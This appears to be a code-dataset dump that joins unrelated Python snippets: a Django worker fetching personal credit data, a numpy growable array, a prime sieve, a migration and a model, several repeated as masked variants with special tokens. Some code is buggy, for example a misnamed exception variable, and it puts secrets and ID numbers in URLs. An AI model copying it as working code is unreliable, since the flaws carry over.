success = res["success"]
if success != "true":
return None
return res
except KeyError, e:
return None
#def _get_report_data(self, access_token, user):
# report_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (self._access_report_token_api, self._client_secret, access_token, user.name, user.id_no, user.phone_no)
# print report_url
# res = self._open_url(report_url.encode('utf-8'))
# #print res
# #print res['raw_data']['members']['error_msg']
# return res
def _allow_overwrite_data(self, user, options):
return True
def _get_data_from_path(self, data, path):
'''
path语法 / 分割路径 : 选择list中的序号
'''
try:
fields = path.split("/")
#print fields
res = data
for field in fields:
if field.find(":") != -1:
parts = field.split(":")
if len(parts) != 2:
TkLog().error("field format error %s" % (field))
return None
res = res[parts[0]][int(parts[1])]
else:
res = res[field]
return res
except Exception, e:
print e
traceback.print_exc()
TkLog().error("get data from path failed %s" % str(e))
return None
def _save_raw_data(self, data, user, options):
"""
可以重入,一个用户的信息如果更新时间少于options.update_days天,不会更新db,否则添加记录
"""
if not self._allow_overwrite_data(user, options):
return RETURN_CAN_NOT_OVERWRITE
for transtype in self._transformer.keys():
adaptor = self._transformer[transtype]
cls = eval(adaptor["name"])
version = 0
objs = cls.objects.filter(owner=user).order_by('-id')[:1]
if len(objs) == 1:
version = objs[0].version
TkLog().info("update %s version %d" % (adaptor["name"], version))
data_list = self._get_data_from_path(data, adaptor["path"])
if not data_list:
TkLog().warn("data not found %s:%s" % (adaptor["name"], adaptor["path"]))
#return -4 #just skip
ret_code = self._save_obj(data_list, cls, user, adaptor, version)
if ret_code != 0:
return ret_code
return RETURN_SUCCESS
@transaction.commit_manually
def _save_obj(self, data_list, cls, user, adaptor, version=0, parent=None):
'''
将一个对象写入数据库
根据data_type来判断是map还是list
'''
if adaptor["data_type"] == "list": #data_list是列表数据
for record in data_list:
ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)
if ret_code != 0:
return ret_code
elif adaptor["data_type"] == "map": #data_list是单条数据
record = data_list
ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)
if ret_code != 0:
return ret_code
transaction.commit()
return 0
def _save_single_obj(self, record, cls, user, adaptor, version = 0, parent=None):
'''
将一个条目写入数据库,如果parent不为空,还需要设置parent的外键
record : 单条json数据条目
cls : 数据库Model
'''
obj = cls()
for source_field, dest_field in adaptor['trans'].items():
if isinstance(dest_field,str):
field_type = obj._meta.get_field(dest_field)
if "/" in source_field:
record[source_field] = self._get_data_from_path(record,source_field)
if isinstance(field_type, models.CharField):
try:
if isinstance(record[source_field],list):
#setattr(obj, dest_field, "#".join(record[source_field]))
setattr(obj, dest_field, record[source_field][0])
else:
setattr(obj, dest_field, record[source_field])
except Exception, e:
TkLog().warn("set char field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.IntegerField):
try:
if not record[source_field]:
setattr(obj, dest_field, 0)
else:
setattr(obj, dest_field, int(record[source_field]))
except Exception, e:
TkLog().warn("set int field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.BigIntegerField):
try:
if not record[source_field]:
setattr(obj, dest_field, 0)
else:
setattr(obj, dest_field, long(record[source_field]))
except Exception, e:
TkLog().warn("set bigint field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.FloatField):
try:
if not record[source_field]:
setattr(obj, dest_field, float(0))
else:
setattr(obj, dest_field, float(record[source_field]))
except Exception, en:
TkLog().warn("set float field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.DateTimeField):
try:
if not record[source_field]:
setattr(obj, dest_field, None)
else:
setattr(obj, dest_field, datetime.strptime(record[source_field], "%Y-%m-%d %H:%M:%S"))
except Exception, e:
TkLog().warn("set datetime field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.NullBooleanField):
try:
if not record[source_field]:
setattr(obj, dest_field, None)
else:
setattr(obj, dest_field, record[source_field])
except Exception, e:
TkLog().warn("set boolean field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
else:
TkLog().error("unsupported type field:%s" % dest_field)
return ERR_UNSUPPORTED_FILED_TYPE
try:
if adaptor['version']:
obj.version = version + 1
else:
obj.version = 0
#if parent:
#setattr(obj, parent["field"], parent["parent_obj"])
obj.owner = user
obj.save()
except Exception, e:
print "save error %s" % str(e)
return ERR_SAVE_OBJECT
for source_field, dest_field in adaptor['trans'].items():
if isinstance(dest_field,dict):
try:
sub_cls = eval(dest_field["name"])
self._save_obj(record[source_field], sub_cls, obj, dest_field, version, {"parent_obj":obj, "field":"owner"})
except Exception, e:
TkLog().warn("set foreignkey field failed %s %s" % (str(e), record[source_field]))
objgraph.show_most_common_types()
return 0
|
normal
|
{
"blob_id": "fa825846c54ed32c2ede94128ac08f9d5e172c0f",
"index": 5581,
"step-1": "# -*- coding: utf-8 -*-\nimport urllib2, json, traceback\n\nfrom django.conf import settings\nfrom django.db import models\nfrom TkManager.order.models import User\nfrom TkManager.juxinli.models import *\nfrom TkManager.juxinli.error_no import *\nfrom TkManager.common.tk_log import TkLog\nfrom datetime import datetime\nfrom django_gearman_commands import GearmanWorkerBaseCommand\nfrom django.db import transaction\nimport objgraph\n\nclass JuxinliBaseCommand(GearmanWorkerBaseCommand):\n \"\"\"\n 从聚信力获取json数据,然后把数据存入数据库\n init_config 配置数据的存储方式,需要子类自己实现 配置文件格式参看注释\n get_juxinli_data 执行解析存储操作\n\n \"\"\"\n def __init__(self):\n super(JuxinliBaseCommand, self).__init__()\n self._org_name = settings.JUXINLI_CONF['org_name']\n self._client_secret = settings.JUXINLI_CONF['client_secret']\n self._access_report_data_api = settings.JUXINLI_CONF['access_report_data_api']\n self._access_raw_data_api = settings.JUXINLI_CONF['access_raw_data_api']\n self._access_report_token_api = settings.JUXINLI_CONF['access_report_token_api']\n self._access_e_business_raw_data_api = settings.JUXINLI_CONF['access_e_business_raw_data_api']\n self._options = {\n 'update_days' : 21,\n 'force_update' : False,\n }\n self.init_config()\n\n def init_config():\n '''\n 参考格式:\n self._transformer = {\n 'basic_transformer' : {\n 'name' : 'PhoneBasic', # django的Model类名称\n 'path' : 'raw_data/members/transactions:0/basic', #json数据的路径\n 'data_type' : 'map', # 数据的类型如果是单条就是map,如果是多条就是list\n 'version' : True, # 是否使用版本控制,如果是真那么每次拉数据会新增版本号,否则都用版本1\n 'trans' : { #数据的转化格式 source_field(json) -> dest_field(db model)\n \"cell_phone\": \"cell_phone\",\n \"idcard\": \"idcard\",\n \"real_name\": \"real_name\",\n \"reg_time\": \"reg_time\",\n \"update_time\": \"update_time\",\n \"receiver\" : { #如果是外键就用一个嵌套的格式来表示 (嵌套就没必要再用path定位了吧,默认就是当前路径)\n \"name\" : \"Receiver\"\n\n \"req_call_cnt/data_type\" : \"list\"\n\n \"version\" : True,\n \"trans\": {\n \"name\" : \"name\",\n \"phone_num_list\" : \"phone_num_list\",\n 
\"amount\" : \"amount\",\n \"count\" : \"count\",\n },\n },\n\n },\n },\n }\n '''\n pass\n\n def test(self,user,data):\n if not data:\n return ERR_GET_RAW_DATA_FAILED\n ret_code = self._save_raw_data(data, user, self._options)\n\treturn ret_code\n\n def get_juxinli_data(self, uid, url):\n try:\n user = User.objects.get(pk=uid)\n token = self._get_token()\n if not token:\n return ERR_CREATE_TOKEN_FAILED\n data = self._get_juxinli_data(token, user, url)\n if not data:\n return ERR_GET_RAW_DATA_FAILED\n ret_code = self._save_raw_data(data, user, self._options)\n if ret_code != 0:\n return ret_code\n #data = self._get_report_data(token, user)\n #print data\n #print \"@@ print ret\", ret_code\n return RETURN_SUCCESS\n except Exception, e:\n traceback.print_exc()\n TkLog().error(\"get juxinli call failed %s\" % str(e))\n return ERR_OTHER_EXCEPTION\n\n def _open_url(self, url):\n '''\n get http request return json\n '''\n req1 = urllib2.Request(url=url)\n html = urllib2.urlopen(req1).read().decode('utf-8')\n return json.loads(html.encode(\"utf-8\"))\n\n def _get_token(self):\n '''\n 生成一个新的用来获取数据的token 失败返回None\n '''\n url = u\"%s?client_secret=%s&hours=24&org_name=%s\" % (self._access_report_token_api, self._client_secret, self._org_name)\n html = self._open_url(url)\n #if\n try:\n res = html['access_token']\n return res\n except KeyError, e:\n return None\n\n def _get_juxinli_data(self, access_token, user, url):\n '''\n 获取聚信力数据 返回json\n '''\n raw_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (url, self._client_secret, access_token, user.name, user.id_no, user.phone_no)\n #print raw_url\n try:\n res = self._open_url(raw_url.encode('utf-8'))\n # print res\n # print res['raw_data']['members']['error_msg']\n success = res[\"success\"]\n if success != \"true\":\n return None\n return res\n except KeyError, e:\n return None\n #def _get_report_data(self, access_token, user):\n # report_url = 
u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (self._access_report_token_api, self._client_secret, access_token, user.name, user.id_no, user.phone_no)\n # print report_url\n # res = self._open_url(report_url.encode('utf-8'))\n # #print res\n # #print res['raw_data']['members']['error_msg']\n # return res\n\n def _allow_overwrite_data(self, user, options):\n return True\n\n def _get_data_from_path(self, data, path):\n '''\n path语法 / 分割路径 : 选择list中的序号\n '''\n try:\n fields = path.split(\"/\")\n #print fields\n res = data\n for field in fields:\n if field.find(\":\") != -1:\n parts = field.split(\":\")\n if len(parts) != 2:\n TkLog().error(\"field format error %s\" % (field))\n return None\n res = res[parts[0]][int(parts[1])]\n else:\n res = res[field]\n return res\n except Exception, e:\n print e\n traceback.print_exc()\n TkLog().error(\"get data from path failed %s\" % str(e))\n return None\n\n def _save_raw_data(self, data, user, options):\n \"\"\"\n 可以重入,一个用户的信息如果更新时间少于options.update_days天,不会更新db,否则添加记录\n \"\"\"\n if not self._allow_overwrite_data(user, options):\n return RETURN_CAN_NOT_OVERWRITE\n for transtype in self._transformer.keys():\n adaptor = self._transformer[transtype]\n cls = eval(adaptor[\"name\"])\n version = 0\n objs = cls.objects.filter(owner=user).order_by('-id')[:1]\n if len(objs) == 1:\n version = objs[0].version\n TkLog().info(\"update %s version %d\" % (adaptor[\"name\"], version))\n data_list = self._get_data_from_path(data, adaptor[\"path\"])\n if not data_list:\n TkLog().warn(\"data not found %s:%s\" % (adaptor[\"name\"], adaptor[\"path\"]))\n #return -4 #just skip\n\n ret_code = self._save_obj(data_list, cls, user, adaptor, version)\n if ret_code != 0:\n return ret_code\n return RETURN_SUCCESS\n\n\n @transaction.commit_manually\n def _save_obj(self, data_list, cls, user, adaptor, version=0, parent=None):\n\n '''\n 将一个对象写入数据库\n 根据data_type来判断是map还是list\n '''\n if adaptor[\"data_type\"] == \"list\": #data_list是列表数据\n\n 
for record in data_list:\n\n ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)\n if ret_code != 0:\n return ret_code\n elif adaptor[\"data_type\"] == \"map\": #data_list是单条数据\n\n record = data_list\n\n ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)\n if ret_code != 0:\n return ret_code\n transaction.commit()\n return 0\n\n def _save_single_obj(self, record, cls, user, adaptor, version = 0, parent=None):\n '''\n 将一个条目写入数据库,如果parent不为空,还需要设置parent的外键\n record : 单条json数据条目\n cls : 数据库Model\n '''\n obj = cls()\n for source_field, dest_field in adaptor['trans'].items():\n if isinstance(dest_field,str):\n field_type = obj._meta.get_field(dest_field)\n if \"/\" in source_field:\n record[source_field] = self._get_data_from_path(record,source_field)\n if isinstance(field_type, models.CharField):\n try:\n if isinstance(record[source_field],list):\n\n #setattr(obj, dest_field, \"#\".join(record[source_field]))\n setattr(obj, dest_field, record[source_field][0])\n else:\n setattr(obj, dest_field, record[source_field])\n except Exception, e:\n TkLog().warn(\"set char field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.IntegerField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, 0)\n else:\n setattr(obj, dest_field, int(record[source_field]))\n except Exception, e:\n TkLog().warn(\"set int field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.BigIntegerField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, 0)\n else:\n setattr(obj, dest_field, long(record[source_field]))\n except Exception, e:\n TkLog().warn(\"set bigint field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.FloatField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, float(0))\n else:\n setattr(obj, 
dest_field, float(record[source_field]))\n except Exception, en:\n TkLog().warn(\"set float field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.DateTimeField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, None)\n else:\n setattr(obj, dest_field, datetime.strptime(record[source_field], \"%Y-%m-%d %H:%M:%S\"))\n except Exception, e:\n TkLog().warn(\"set datetime field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.NullBooleanField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, None)\n else:\n setattr(obj, dest_field, record[source_field])\n except Exception, e:\n TkLog().warn(\"set boolean field failed %s %s\" % (str(e), record[source_field]))\n\n return ERR_SETATTR_FAILED\n else:\n TkLog().error(\"unsupported type field:%s\" % dest_field)\n return ERR_UNSUPPORTED_FILED_TYPE\n try:\n\n if adaptor['version']:\n obj.version = version + 1\n else:\n obj.version = 0\n #if parent:\n #setattr(obj, parent[\"field\"], parent[\"parent_obj\"])\n\n obj.owner = user\n obj.save()\n except Exception, e:\n print \"save error %s\" % str(e)\n return ERR_SAVE_OBJECT\n\n for source_field, dest_field in adaptor['trans'].items():\n if isinstance(dest_field,dict):\n try:\n sub_cls = eval(dest_field[\"name\"])\n self._save_obj(record[source_field], sub_cls, obj, dest_field, version, {\"parent_obj\":obj, \"field\":\"owner\"})\n except Exception, e:\n\n TkLog().warn(\"set foreignkey field failed %s %s\" % (str(e), record[source_field]))\n objgraph.show_most_common_types()\n\treturn 0\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
<|reserved_special_token_0|>
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
def ixifyfile(file, vocab=None):
even = True
arr = Growable()
for sentence in read_file(file):
six = numpy.array([vocab.get(word) for word in sentence], dtype=
numpy.uint32)
if not even:
six |= B
even = not even
arr.update(six)
return arr.finalize(), even
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy
import multiprocessing
from functools import partial
from textutil.text import read_file
from textutil.util import B
import mmap
import tqdm
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
def ixifyfile(file, vocab=None):
even = True
arr = Growable()
for sentence in read_file(file):
six = numpy.array([vocab.get(word) for word in sentence], dtype=
numpy.uint32)
if not even:
six |= B
even = not even
arr.update(six)
return arr.finalize(), even
def ixifyfiles(ixfile, files, vocab):
ixf = partial(ixifyfile, vocab=vocab)
even = True
files = list(files)
with open(ixfile, 'wb') as ixhandle:
with multiprocessing.Pool(8) as pool:
for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files),
total=len(files)):
if even:
ixhandle.write(arr.tobytes())
else:
ixhandle.write((arr ^ B).tobytes())
even = not i_even ^ even
<|reserved_special_token_1|>
import numpy
import multiprocessing
from functools import partial
from textutil.text import read_file
from textutil.util import B
import mmap
import tqdm
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity=capacity
self.dtype=dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size : self.size+n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
def ixifyfile(file, vocab=None):
even = True
arr = Growable()
for sentence in read_file(file):
six = numpy.array([vocab.get(word) for word in sentence], dtype=numpy.uint32)
if not even:
six |= B
even = not even
arr.update(six)
return arr.finalize(), even
def ixifyfiles(ixfile, files, vocab):
ixf = partial(ixifyfile, vocab=vocab)
even = True
files = list(files)
with open(ixfile, 'wb') as ixhandle:
with multiprocessing.Pool(8) as pool:
for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files), total=len(files)):
if even:
ixhandle.write(arr.tobytes())
else:
ixhandle.write((arr ^ B).tobytes())
even = not (i_even ^ even)
|
flexible
|
{
"blob_id": "8a2fe83ab1adae7de94eb168290ce4843ab39fe1",
"index": 9476,
"step-1": "<mask token>\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n <mask token>\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\ndef ixifyfile(file, vocab=None):\n even = True\n arr = Growable()\n for sentence in read_file(file):\n six = numpy.array([vocab.get(word) for word in sentence], dtype=\n numpy.uint32)\n if not even:\n six |= B\n even = not even\n arr.update(six)\n return arr.finalize(), even\n\n\n<mask token>\n",
"step-4": "import numpy\nimport multiprocessing\nfrom functools import partial\nfrom textutil.text import read_file\nfrom textutil.util import B\nimport mmap\nimport tqdm\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\ndef ixifyfile(file, vocab=None):\n even = True\n arr = Growable()\n for sentence in read_file(file):\n six = numpy.array([vocab.get(word) for word in sentence], dtype=\n numpy.uint32)\n if not even:\n six |= B\n even = not even\n arr.update(six)\n return arr.finalize(), even\n\n\ndef ixifyfiles(ixfile, files, vocab):\n ixf = partial(ixifyfile, vocab=vocab)\n even = True\n files = list(files)\n with open(ixfile, 'wb') as ixhandle:\n with multiprocessing.Pool(8) as pool:\n for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files),\n total=len(files)):\n if even:\n ixhandle.write(arr.tobytes())\n else:\n ixhandle.write((arr ^ B).tobytes())\n even = not i_even ^ even\n",
"step-5": "import numpy\nimport multiprocessing\nfrom functools import partial\nfrom textutil.text import read_file\nfrom textutil.util import B\nimport mmap\nimport tqdm\n\n\n\nclass Growable(object):\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity=capacity\n self.dtype=dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size : self.size+n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\ndef ixifyfile(file, vocab=None):\n even = True\n arr = Growable()\n for sentence in read_file(file):\n six = numpy.array([vocab.get(word) for word in sentence], dtype=numpy.uint32)\n if not even:\n six |= B\n even = not even\n arr.update(six)\n return arr.finalize(), even\n\n\ndef ixifyfiles(ixfile, files, vocab):\n ixf = partial(ixifyfile, vocab=vocab)\n even = True\n files = list(files)\n with open(ixfile, 'wb') as ixhandle:\n with multiprocessing.Pool(8) as pool:\n for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files), total=len(files)):\n if even:\n ixhandle.write(arr.tobytes())\n else:\n ixhandle.write((arr ^ B).tobytes())\n even = not (i_even ^ even)\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
def erato(n):
m = int(n ** 0.5)
sieve = [True for _ in range(n+1)]
sieve[1] = False
for i in range(2, m+1):
if sieve[i]:
for j in range(i+i, n+1, i):
sieve[j] = False
return sieve
input()
l = list(map(int, input().split()))
max_n = max(l)
prime_l = erato(max_n)
ans = 0
for i in l:
if prime_l[i]:
ans += 1
print(ans)
|
normal
|
{
"blob_id": "28eb1d7a698480028fb64827746b3deec0f66a9a",
"index": 6224,
"step-1": "<mask token>\n",
"step-2": "def erato(n):\n m = int(n ** 0.5)\n sieve = [(True) for _ in range(n + 1)]\n sieve[1] = False\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\n<mask token>\n",
"step-3": "def erato(n):\n m = int(n ** 0.5)\n sieve = [(True) for _ in range(n + 1)]\n sieve[1] = False\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\ninput()\n<mask token>\nfor i in l:\n if prime_l[i]:\n ans += 1\nprint(ans)\n",
"step-4": "def erato(n):\n m = int(n ** 0.5)\n sieve = [(True) for _ in range(n + 1)]\n sieve[1] = False\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\ninput()\nl = list(map(int, input().split()))\nmax_n = max(l)\nprime_l = erato(max_n)\nans = 0\nfor i in l:\n if prime_l[i]:\n ans += 1\nprint(ans)\n",
"step-5": "def erato(n):\n m = int(n ** 0.5)\n sieve = [True for _ in range(n+1)]\n sieve[1] = False\n\n for i in range(2, m+1):\n if sieve[i]:\n for j in range(i+i, n+1, i):\n sieve[j] = False\n return sieve\n\ninput()\nl = list(map(int, input().split()))\nmax_n = max(l)\nprime_l = erato(max_n)\nans = 0\nfor i in l:\n if prime_l[i]:\n ans += 1\nprint(ans)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('KYusers', '0017_caprofile_regs')]
operations = [migrations.AddField(model_name='message', name=
'mard_read', field=models.BooleanField(default=False)), migrations.
AlterField(model_name='caprofile', name='regs', field=models.
ManyToManyField(blank=True, related_name='regs', to=
'KYusers.KYProfile'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('KYusers', '0017_caprofile_regs')]
operations = [migrations.AddField(model_name='message', name=
'mard_read', field=models.BooleanField(default=False)), migrations.
AlterField(model_name='caprofile', name='regs', field=models.
ManyToManyField(blank=True, related_name='regs', to=
'KYusers.KYProfile'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-28 17:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('KYusers', '0017_caprofile_regs'),
]
operations = [
migrations.AddField(
model_name='message',
name='mard_read',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='caprofile',
name='regs',
field=models.ManyToManyField(blank=True, related_name='regs', to='KYusers.KYProfile'),
),
]
|
flexible
|
{
"blob_id": "12c3fe8a3ca1e660eeb90b16eca17eddd47e5de7",
"index": 7124,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('KYusers', '0017_caprofile_regs')]\n operations = [migrations.AddField(model_name='message', name=\n 'mard_read', field=models.BooleanField(default=False)), migrations.\n AlterField(model_name='caprofile', name='regs', field=models.\n ManyToManyField(blank=True, related_name='regs', to=\n 'KYusers.KYProfile'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('KYusers', '0017_caprofile_regs')]\n operations = [migrations.AddField(model_name='message', name=\n 'mard_read', field=models.BooleanField(default=False)), migrations.\n AlterField(model_name='caprofile', name='regs', field=models.\n ManyToManyField(blank=True, related_name='regs', to=\n 'KYusers.KYProfile'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.8 on 2016-10-28 17:08\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('KYusers', '0017_caprofile_regs'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='mard_read',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='caprofile',\n name='regs',\n field=models.ManyToManyField(blank=True, related_name='regs', to='KYusers.KYProfile'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.db import models
class Book(models.Model):
title = models.TextField(max_length=32, blank=False, null=False)
# from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, BaseUserManager
#
#
# class UserAccountManager(BaseUserManager):
# def create_user(self, email, firstname,lastname, phonenumber, password=None,):
#
# if not email:
# raise ValueError('Users must have an email address')
# email = self.normalize_email(email)
# user = self.model(email=email, name=firstname)
# user.set_password(password)
# user.save()
#
# class UserAccount(AbstractBaseUser, PermissionsMixin):
# email = models.EmailField(max_length=255, unique=True)
